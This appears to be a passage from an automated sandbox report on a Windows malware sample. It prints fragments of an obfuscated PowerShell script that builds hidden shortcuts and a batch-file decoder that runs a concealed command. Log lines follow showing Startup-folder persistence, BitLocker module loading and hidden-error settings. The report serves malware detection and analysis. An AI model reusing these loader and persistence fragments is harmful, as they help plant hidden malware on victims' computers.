"${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai" ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\" ${/=\/\__/=\/=\/=\_}.WindowStyle = 7 ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA=='))) ${/=\/\__/=\/=\/=\_}.Save() }finally{}}function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Argume
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd ${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}" ${\\\\__/////////} = "@Echo off`r`n"${\\\\__/////////} += "Setlocal EnableExtensions`r`n" ${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n" ${\\\\__/////////} += "cd %SystemRoot%\System32`r`n" ${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n" ${\\\\__/////////} | Set-Content ${/_//_//_/}function _____/\_/\/\_/\/=\\\\\\\\\\/////{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai" ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\" ${/=\/\__/=\/=\/=\_}.WindowStyle = 7 ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA=='))) ${/=\/\__/=\/=\/=\_}.Save() }finally{}}function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Argume
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnkJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnkJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\_kjfech8_V\_kjfech8_Vi7.exeCode function: 9_2_6FDCA277 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,9_2_6FDCA277
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
